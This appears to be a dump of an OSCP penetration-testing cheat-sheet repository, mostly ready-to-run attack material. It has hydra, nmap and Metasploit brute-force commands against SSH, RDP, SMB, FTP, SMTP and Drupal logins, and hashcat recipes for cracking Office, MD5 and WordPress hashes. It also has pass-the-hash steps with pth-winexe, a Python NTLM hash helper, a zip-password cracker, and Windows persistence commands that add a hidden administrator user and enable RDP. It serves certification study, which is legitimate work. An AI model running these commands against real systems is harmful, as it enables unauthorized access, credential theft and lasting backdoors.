 * could move JOHN_RC4_INT to arch.h
 *
 * Syntax is same as OpenSSL;
 * just #include "rc4.h" instead of <openssl/rc4.h>
 *
 * Put together by magnum in 2011. No Rights Reserved.
 */

#include "rc4.h"

#define swap_byte(a, b) { RC4_INT swapByte = (*a); (*a) = (*b); (*b) = swapByte; }

/* Key-scheduling step: mix key byte index1 into state[n], cycling the key. */
#define swap_state(n) { \
	index2 = (key_data_ptr[index1] + state[(n)] + index2) % 256; \
	swap_byte(&state[(n)], &state[index2]); \
	if (++index1 == key_data_len) index1 = 0; \
}

void RC4_set_key(RC4_KEY *key, RC4_INT key_data_len, const unsigned char *key_data_ptr)
{
	RC4_INT index1;
	RC4_INT index2;
	RC4_INT *state;
	RC4_INT counter;

	state = &key->state[0];
	for(counter = 0; counter < 256; counter++)
		state[counter] = counter;
	key->x = 0;
	key->y = 0;
	index1 = 0;
	index2 = 0;
	/* unrolled by four: the KSA is the hot path when brute-forcing keys */
	for(counter = 0; counter < 256; counter += 4) {
		swap_state(counter);
		swap_state(counter + 1);
		swap_state(counter + 2);
		swap_state(counter + 3);
	}
}

void RC4(RC4_KEY *key, RC4_INT buffer_len, const unsigned char *buffer_ptr, unsigned char *out)
{
	RC4_INT x;
	RC4_INT y;
	RC4_INT *state;
	RC4_INT counter;

	x = key->x;
	y = key->y;

	state = &key->state[0];
	for(counter = 0; counter < buffer_len; counter ++)
	{
		/* the original lacked the wrap; with RC4_INT = unsigned int, x ran
		 * past state[255] once more than 256 bytes were processed */
		x = (x + 1) % 256;
		y = (state[x] + y) % 256;
		swap_byte(&state[x], &state[y]);
		*out++ = buffer_ptr[counter] ^ state[(state[x] + state[y]) % 256];
	}
	key->x = x;
	key->y = y;
}
--------------------------------------------------------------------------------
/bruteforce & password_attacks/Crack Ms Office _ 2007/rc4.h:
--------------------------------------------------------------------------------
/*
 * Our own RC4 based on the "original" as posted to sci.crypt in 1994 and
 * tweaked for performance on x86-64. OpenSSL is probably faster for
 * decrypting larger amounts of data but we are more interested in a very
 * fast key setup. On Intel and AMD x64, I have seen up to 50% speedups.
 *
 * The speed improvement (if you see one) is due to OpenSSL's (or your
 * distributor's) choice of type for RC4_INT. Some systems perform bad if
 * this is defined as char. Others perform bad if it's not. If needed, we
 * could move JOHN_RC4_INT to arch.h
 *
 * Syntax is same as OpenSSL;
 * just #include "rc4.h" instead of <openssl/rc4.h>
 *
 * Put together by magnum in 2011. No Rights Reserved.
 */

#ifndef HEADER_RC4_H
#define HEADER_RC4_H

/* prefixed names so this can coexist with OpenSSL's own RC4 symbols */
#define RC4_KEY JOHN_RC4_KEY
#define RC4_INT JOHN_RC4_INT
#define RC4_set_key JOHN_RC4_set_key
#define RC4 JOHN_RC4

#define JOHN_RC4_INT unsigned int

typedef struct rc4_key
{
	RC4_INT state[256];
	RC4_INT x;
	RC4_INT y;
} RC4_KEY;

extern void RC4(RC4_KEY *key, RC4_INT len, const unsigned char *indata, unsigned char *outdata);
extern void RC4_set_key(RC4_KEY *key, RC4_INT len, const unsigned char *data);

#endif /* HEADER_RC4_H */
--------------------------------------------------------------------------------
/bruteforce & password_attacks/Crack Ms Office _ 2007/zip.hashes:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/bruteforce & password_attacks/Crack Ms Office _ 2007/zip.hashes
--------------------------------------------------------------------------------
/bruteforce & password_attacks/bruteforce_commands.txt:
--------------------------------------------------------------------------------
# convert hashes to uppercase for LM hashes
tr a-z A-Z < ./ralph2.txt

## SMB bruteforce
nmap --script=smb-brute.nse 192.x.x.x
nmap -sV -p 445 --script smb-brute 192.168.13.200-254
acccheck -v -t 10.1.1.22 -u kevin -P /usr/share/wordlists/rockyou.txt

## HTTP bruteforce (forms)
# format is "path:POST body with ^USER^/^PASS^:string that marks a FAILED login"
hydra -l admin -P /root/ctf_wordlist.txt domain.com http-post-form "/admin.php:u=^USER^&p=^PASS^&f=login:'Enter your username and password to continue'" -V

## RDP bruteforce
hydra -t 4 -V -l root -P /usr/share/wordlists/rockyou.txt rdp://192.168.x.x

## SSH bruteforce
# keep -t 4 for ssh (hydra itself recommends it); more parallel tasks make sshd drop connections
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.13.234 ssh
hydra -t 4 -L /usr/share/wordlists/cristi.txt -P /usr/share/wordlists/cristi-passwords.txt 192.168.13.236 ssh
hydra -t 4 -L /usr/share/wordlists/cristi.txt -p some_password 192.168.13.236 ssh
hydra -t 4 -l root -P /usr/share/wordlists/cristi-passwords.txt 127.0.0.1 -s 50000 ssh

## Bruteforce FTP
hydra -t 4 -L /usr/share/wordlists/cristi.txt -P /usr/share/wordlists/cristi-passwords.txt 192.168.13.236 ftp
use auxiliary/scanner/ftp/ftp_login

## Bruteforce POP3
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.158 pop3

## DNS bruteforce
nmap -p 80 --script dns-brute.nse domain.com
python dnscan.py -d domain.com -w ./subdomains-10000.txt

## MySQL bruteforce
nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/mysql_users.txt,passdb=/usr/share/wordlists/rockyou.txt -vv 192.168.31.139
OR with hexorbase

## SMTP brute force
hydra -s 25 -v -V -l root@ucal.local -P /usr/share/wordlists/rockyou.txt -t 1 -w 20 -f 192.168.29.55 smtp

-l LOGIN name
-P load several passwords from FILE
-s port
-v verbose mode
-V show login+pass combination for each attempt
-t run TASKS number of connects in parallel
-w waittime for responses (32s) / between connects per thread
-f exit after the first found login/password pair

## Telnet bruteforce

use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf auxiliary(telnet_login) > set PASS_FILE passwords.txt
PASS_FILE => passwords.txt
msf auxiliary(telnet_login) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(telnet_login) > set THREADS 254
THREADS => 254
msf auxiliary(telnet_login) > set USER_FILE users.txt
USER_FILE => users.txt
msf auxiliary(telnet_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(telnet_login) > run

msf auxiliary(telnet_login) > sessions -l // to see the sessions that succeeded

## MySql, Oracle, PostgreSQL, SQLlite, MS-Sql bruteforcer and database browser
hexorbase

## Generate a wordlist from a webpage
cewl www.megacorpone.com -m 6 -w /root/newfilelist.txt 2>/dev/null

## Mangle/permutate a wordlist with john
john --wordlist=cewlgeneratedwordlist.txt --rules --stdout > megamangled.txt

## Drupal bruteforce attack
#crack the password of admin
site="192.168.230.147"
# form_build_id is generated per page load, so fetch it right before the run
id=$(curl -s http://$site/user/|grep "form_build_id" |cut -d"\"" -f6)
hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt $site http-form-post "/?q=user/:name=^USER^&pass=^PASS^&form_id=user_login&form_build_id="$id":Sorry" -V

#crack MD5 with hashcat and wordlist. -a 0 is the straight (wordlist) attack
oclHashcat64.exe -m 0 -a 0 C:\Users\Cristi\Downloads\hashuri.txt F:\wordlist\realuniq.lst
oclHashcat64.exe -m 0 --pw-max=8 C:\Users\Cristi\Downloads\hashuri.txt F:\wordlist\realuniq.lst

#Brute force Wordpress (PHPASS) with a wordlist: -m 400 is phpass, -a 0 is the
#wordlist attack (-a 3 expects a mask, not a wordlist)
cudahashcat64.exe -m 400 -a 0 hashfile wordlist
--------------------------------------------------------------------------------
/bruteforce & password_attacks/office2john.py/read-me:
--------------------------------------------------------------------------------

python ./office2john.py ./filename.docx

//filename being the protected document.
After a second you will see the output like below:

root@k22:~/Downloads/crackers/Microsoft Office RC40 cracker# python ./office2john.py ../file1.docx
file1.docx:$office$*2007*20*128*16*75a4db9cc30c376ad9e05505b1afa100*d777bd01af371bbcc21139e34119b832*1c091f9e02d549f98073ed060429a4649d2c0d6b

oclHashcat -a 0 -m 9400 --status -o found.txt hash.txt pass.txt
//use --restore to resume an interrupted session
//strip the "file1.docx:" prefix from the line (or pass --username) before hashcat parses it


Office 97-03(MD5+RC4,oldoffice$0,oldoffice$1): flag -m 9700
Office 97-03(MD5+RC4,collider-mode#1): flag -m 9710
Office 97-03(MD5+RC4,collider-mode#2): flag -m 9720
Office 97-03(SHA1+RC4,oldoffice$3,oldoffice$4): flag -m 9800
Office 97-03(SHA1+RC4,collider-mode#1): flag -m 9810
Office 97-03(SHA1+RC4,collider-mode#2): flag -m 9820
Office 2007: flag -m 9400
Office 2010: flag -m 9500
Office 2013: flag -m 9600


http://blog.infosecsee.com/2015/02/cracking-password-protected-word-excel.html
http://pentestcorner.com/cracking-microsoft-office-97-03-2007-2010-2013-password-hashes-with-hashcat/

--------------------------------------------------------------------------------
/bruteforce & password_attacks/pass-the-haash:
--------------------------------------------------------------------------------

Using fgdump.exe you dump the password hashes.

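Added example (not code from these notes, nor from fgdump or the pth tools): a Python 3 script that turns a pwdump-style line into the LM:NT value SMBHASH expects and checks guessed passwords against the NT hash offline. NTLM is MD4 over the UTF-16LE password; MD4 is implemented inline because hashlib's md4 is a "legacy" algorithm that many OpenSSL 3 builds no longer expose. The svc_backup line, its RID and its NT hash (that of the password "password") are constructed sample data, and all function names are this example's own. The "NO PASSWORD" marker is mapped to the empty-LM value aad3b435b51404eeaad3b435b51404ee, which the pth tools accept because only the NT half is used to authenticate.

```python
import struct

MASK = 0xFFFFFFFF

# LM hash of the empty string. fgdump/pwdump print "NO PASSWORD****..." when
# no LM hash is stored; pth-winexe/pth-wmis only use the NT half, so this is a
# safe filler for the LM field of the LM:NT pair.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


# RFC 1320 rounds: (boolean function, additive constant, X[k] order, shifts)
_ROUNDS = (
    (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
     list(range(16)), (3, 7, 11, 19)),
    (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
     [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
    (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
     [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
)


def md4(data: bytes) -> bytes:
    """MD4 in pure Python; fine for a handful of hashes, not for cracking."""
    msg = bytearray(data) + b"\x80"          # message + mandatory 1 bit
    while len(msg) % 64 != 56:
        msg += b"\x00"                       # zero pad to 56 mod 64
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, k, order, shifts in _ROUNDS:
            for i in range(16):
                t = (a + func(b, c, d) + x[order[i]] + k) & MASK
                # register roles rotate each step: a<-d, b<-new, c<-b, d<-c
                a, b, c, d = d, _rotl(t, shifts[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def ntlm_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), as lowercase hex like pwdump prints."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump_line(line: str) -> dict:
    """'user:rid:LM:NT:::' -> dict. The NO PASSWORD marker becomes EMPTY_LM."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    if lm.upper().startswith("NO PASSWORD"):
        lm = EMPTY_LM
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def smbhash_value(line: str) -> str:
    """The LM:NT string for SMBHASH (or after 'user%' on the pth-winexe line)."""
    rec = parse_pwdump_line(line)
    return f"{rec['lm']}:{rec['nt']}"


def check_password(line: str, candidate: str) -> bool:
    """Offline test of one guessed password against the line's NT hash."""
    return ntlm_hash(candidate) == parse_pwdump_line(line)["nt"]


# Constructed sample line (not from the notes): LM disabled on the host,
# NT hash is that of the password "password".
SAMPLE_LINE = ("svc_backup:1001:NO PASSWORD*********************:"
               "8846F7EAEE8FB117AD06BDD830B7586C:::")

if __name__ == "__main__":
    print("export SMBHASH=" + smbhash_value(SAMPLE_LINE))
    for guess in ("Winter2016", "password"):
        print(f"{guess!r} -> {check_password(SAMPLE_LINE, guess)}")
```

Run it and paste the printed export line, or give the same LM:NT string inline as -U administrator%LM:NT. check_password is for confirming a guess you already have (a password reused from another box, for instance); for real cracking feed the NT hashes to hashcat -m 1000 instead of this pure-Python MD4.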
From the hash file you copy the LM and NTLM part of a line:

Administrator:500:NO PASSWORD*********************:259745CB123A52AA2E693AAACCA2DB52

"NO PASSWORD***" means fgdump found no LM hash stored (LM hashing is off by
default since Vista/2008). pth-winexe still wants the LM:NT form but only
authenticates with the NT hash, so any 32-hex LM value will do; the empty-LM
value aad3b435b51404eeaad3b435b51404ee is the usual filler. Then export both
as a variable:

root@kali:~/Desktop/OSCP# export SMBHASH=0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52


root@kali:~/Desktop/OSCP# /usr/bin/pth-winexe -U administrator% //10.11.1.5 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
smb_signing_good: BAD SIG: seq 1
ERROR: Cannot connect to svcctl pipe. NT_STATUS_ACCESS_DENIED.
root@kali:~/Desktop/OSCP/ALICE#

And it should work, but it doesn't.
Such mystery, much amazing.


The fix:
Ok, it's only taken me two solid days but I've worked out what the issue is.
I have pwned two different machines and downloaded the hashes, but no matter what I did I couldn't get pth-winexe to work. I was getting the same error as you. I cloned the updated PTH files from Git and when I ran the command from those files I got a slightly different more descriptive error message. I searched for that error message on Google and found out that there is a specific service that needs to be running on the target host. I went back to one of my pwned boxes and sure enough the service was not running. Once I started the service the pth-winexe command worked, even from the original installed files, no need for the git versions.

I hope that's not too much of a spoiler Mods?

BTW,
pth-winexe -U Administrator%yyyyyyyyyyyyyyyyyyyyyyyyyyyyy:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx //10.11.1.xxx cmd
gives the error message, but the following works, it authenticates but doesn't give a shell;
pth-wmis -U Administrator%yyyyyyyyyyyyyyyyyyyyyyyyyyyyy:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx //10.11.1.xxx cmd
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
[wmi/wmis.c:172:main()] 1: cmd
NTSTATUS: NT_STATUS_OK - Success

I found the following page, which I'm going to give a try;
http://passing-the-hash.blogspot.ro/2013/07/WMIS-PowerSploit-Shells.htmll
--------------------------------------------------------------------------------
/bruteforce & password_attacks/steghide-bruteforce-tool:
--------------------------------------------------------------------------------

# Tool for bruteforcing steghide password authentication
# crashes on wordlist entries that contain a single quote (')

git clone https://github.com/Va5c0/Steghide-Brute-Force-Tool.git
cd Steghide-Brute-Force-Tool/
chmod +x ./steg_brute.py
pip install progressbar
python ./steg_brute.py -b -d /usr/share/wordlists/rockyou.txt -f cruise-114152_1280.jpg
--------------------------------------------------------------------------------
/bruteforce & password_attacks/zip-cracker.sh:
--------------------------------------------------------------------------------
#!/bin/bash
echo "ZIP-JTR Decrypt Script";
if [ $# -ne 2 ]
then
	echo "Usage: $0 <archive.zip> <wordlist>";
	exit 1;
fi
unzip -l "$1"
# read candidates line by line (the original used a for-in word split, which
# breaks passwords containing spaces)
john --wordlist="$2" --rules --stdout | while IFS= read -r i
do
	echo -ne "\rtrying \"$i\" "
	# unzip exits 0 only if the password decrypted the archive; -o overwrites
	# any previous partial extraction in the current directory
	if unzip -o -P "$i" "$1" >/dev/null 2>&1; then
		echo -e "\nArchive password is: \"$i\""
		break
	fi
done
--------------------------------------------------------------------------------
/persistence/persistence_windows.txt:
--------------------------------------------------------------------------------


# Add Windows user:
net user /add hacker 1234567

# Add user to Administrators groups
net localgroup administrators /add hacker

# Add user to Remote Desktop user group
net localgroup "Remote Desktop users" hacker /add

# Start Remote Desktop service
net start TermService

# Is Remote Desktop Service running?
tasklist /svc | findstr /C:TermService

# Permanently enable Terminal Services (the space after "start=" is required by sc)
sc config TermService start= auto

# Enable Terminal services through registry // reboot after
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Windows Firewall may still block TCP 3389 after the above; the "Remote
# Desktop" rule group has to be enabled as well before the box answers RDP

--------------------------------------------------------------------------------
/whatis/RPC-definition:
--------------------------------------------------------------------------------
Microsoft Remote Procedure Call (RPC) is a powerful technology for creating distributed client/server programs. RPC is an interprocess communication technique that allows client and server software to communicate. The Microsoft RPC facility is compatible with the Open Group's Distributed Computing Environment (DCE) specification for remote procedure calls and is interoperable with other DCE-based RPC systems, such as those for HP-UX and IBM AIX UNIX-based operating systems.
Computer operating systems and programs have steadily gotten more complex over the years. With each release, there are more features. The growing intricacy of systems makes it more difficult for developers to avoid errors during the development process.
Often, developers create a solution for their system or application when a nearly identical solution has already been devised. This duplication of effort consumes time and money and adds complexity to already complex systems.
RPC is designed to mitigate these issues by providing a common interface between applications. RPC serves as a go-between for client/server communications. RPC is designed to make client/server interaction easier and safer by factoring out common tasks, such as security, synchronization, and data flow handling, into a common library so that developers do not have to dedicate the time and effort into developing their own solutions.
--------------------------------------------------------------------------------
/whatis/SMB(CIFS)-definition:
--------------------------------------------------------------------------------
In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS, /ˈsɪfs/), operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows, where it was known as "Microsoft Windows Network" before the subsequent introduction of Active Directory. Corresponding Windows services are LAN Manager Server (for the server component) and LAN Manager Workstation (for the client component).

SMB can run on top of the session (and lower) network layers in several ways:
- Directly over TCP, port 445
- Via the NetBIOS API, which in turn can run on several transports:
  - On UDP ports 137, 138 & TCP ports 137, 139 (NetBIOS over TCP/IP);
  - On several legacy protocols such as NBF, IPX/SPX.

The SMB "Inter-Process Communication" (IPC) system provides named pipes and was one of the first inter-process mechanisms commonly available to programmers that provides a means for services to inherit the authentication carried out when a client first connects to an SMB server.

https://en.wikipedia.org/wiki/Server_Message_Block
--------------------------------------------------------------------------------